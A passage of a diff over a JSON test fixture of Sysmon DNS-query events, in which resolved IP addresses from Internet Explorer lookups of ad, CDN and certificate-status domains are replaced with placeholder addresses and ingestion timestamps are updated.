Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.048\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdnjs.cloudflare.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:104.19.195.151;::ffff:104.19.199.151;::ffff:104.19.198.151;::ffff:104.19.197.151;::ffff:104.19.196.151;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067467200Z'/\u003e\u003cEventRecordID\u003e202\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.048\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdnjs.cloudflare.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:10.067Z", @@ -19090,23 +18831,23 @@ }, "answers": [ { - "data": "85.194.243.23", + "data": "89.160.20.156", "type": "A" }, { - "data": "85.194.243.239", + "data": "89.160.20.156", "type": "A" }, { - "data": "85.194.240.137", + "data": "89.160.20.156", "type": "A" }, { - "data": "85.194.242.103", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -19114,7 +18855,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -19122,7 +18863,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -19130,7 +18871,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -19139,17 +18880,17 @@ } ], "resolved_ip": [ - "85.194.243.23", - "85.194.243.239", - "85.194.240.137", - "85.194.242.103", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, @@ -19165,24 +18906,21 @@ "pixel.onaudience.com" ], "ip": [ - "85.194.243.23", - "85.194.243.239", - "85.194.240.137", - "85.194.242.103", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742542300Z", + "ingested": "2021-12-09T13:50:23.457609600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067488100Z'/\u003e\u003cEventRecordID\u003e203\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.051\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.onaudience.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:85.194.243.23;::ffff:85.194.243.239;::ffff:85.194.240.137;::ffff:85.194.242.103;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067488100Z'/\u003e\u003cEventRecordID\u003e203\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.051\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.onaudience.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:10.067Z", @@ -19250,12 +18988,12 @@ "type": "CNAME" }, { - "data": "72.21.91.29", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "72.21.91.29" + "89.160.20.156" ] }, "network": { @@ -19272,13 +19010,13 @@ "status.geotrust.com" ], "ip": [ - "72.21.91.29" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742550800Z", + "ingested": "2021-12-09T13:50:23.457615800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067504600Z'/\u003e\u003cEventRecordID\u003e204\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.054\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.geotrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067504600Z'/\u003e\u003cEventRecordID\u003e204\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.054\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.geotrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:10.067Z", @@ -19342,11 +19080,11 @@ "type": "CNAME" }, { - "data": "151.139.128.14", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -19354,7 +19092,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -19362,7 +19100,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -19370,7 +19108,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -19378,21 +19116,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "151.139.128.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { @@ -19408,22 +19146,22 @@ "ocsp.trust-provider.com" ], "ip": [ - "151.139.128.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742559300Z", + "ingested": "2021-12-09T13:50:23.457621500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067529300Z'/\u003e\u003cEventRecordID\u003e205\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.126\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.trust-provider.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067529300Z'/\u003e\u003cEventRecordID\u003e205\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.126\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.trust-provider.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:10.067Z", @@ -19494,11 +19232,11 @@ "type": "CNAME" }, { - "data": "151.139.128.14", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -19506,7 +19244,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -19514,7 +19252,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -19522,7 +19260,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -19530,21 +19268,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "151.139.128.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { @@ -19560,22 +19298,22 @@ "ocsp.comodoca4.com" ], "ip": [ - "151.139.128.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742567800Z", + "ingested": "2021-12-09T13:50:23.457629100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067550800Z'/\u003e\u003cEventRecordID\u003e206\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.comodoca4.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067550800Z'/\u003e\u003cEventRecordID\u003e206\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.comodoca4.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:10.067Z", @@ -19643,52 +19381,52 @@ "type": "CNAME" }, { - "data": "52.4.111.14", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.205.68.184", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.0.28.154", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.225.82.232", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.213.13.245", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.22.171.66", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.207.199.229", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.72.57.144", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" } ], "resolved_ip": [ - "52.4.111.14", - "52.205.68.184", - "52.0.28.154", - "34.225.82.232", - "18.213.13.245", - "52.22.171.66", - "52.207.199.229", - "52.72.57.144", - "192.5.6.30" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30" ] }, "network": { @@ -19705,21 +19443,14 @@ "sync.crwdcntrl.net" ], "ip": [ - "52.4.111.14", - "52.205.68.184", - "52.0.28.154", - "34.225.82.232", - "18.213.13.245", - "52.22.171.66", - "52.207.199.229", - "52.72.57.144", - "192.5.6.30" + "89.160.20.156", + "192.168.6.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742576200Z", + "ingested": "2021-12-09T13:50:23.457635200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067594200Z'/\u003e\u003cEventRecordID\u003e207\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.322\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.crwdcntrl.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 td.crwdcntrl.net;type: 5 nginx-bcp-stackB-428666447.us-east-1.elb.amazonaws.com;::ffff:52.4.111.14;::ffff:52.205.68.184;::ffff:52.0.28.154;::ffff:34.225.82.232;::ffff:18.213.13.245;::ffff:52.22.171.66;::ffff:52.207.199.229;::ffff:52.72.57.144;192.5.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067594200Z'/\u003e\u003cEventRecordID\u003e207\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.322\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.crwdcntrl.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 td.crwdcntrl.net;type: 5 nginx-bcp-stackB-428666447.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:10.067Z", @@ -19791,11 +19522,11 @@ "type": "CNAME" }, { - "data": "159.127.42.114", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": 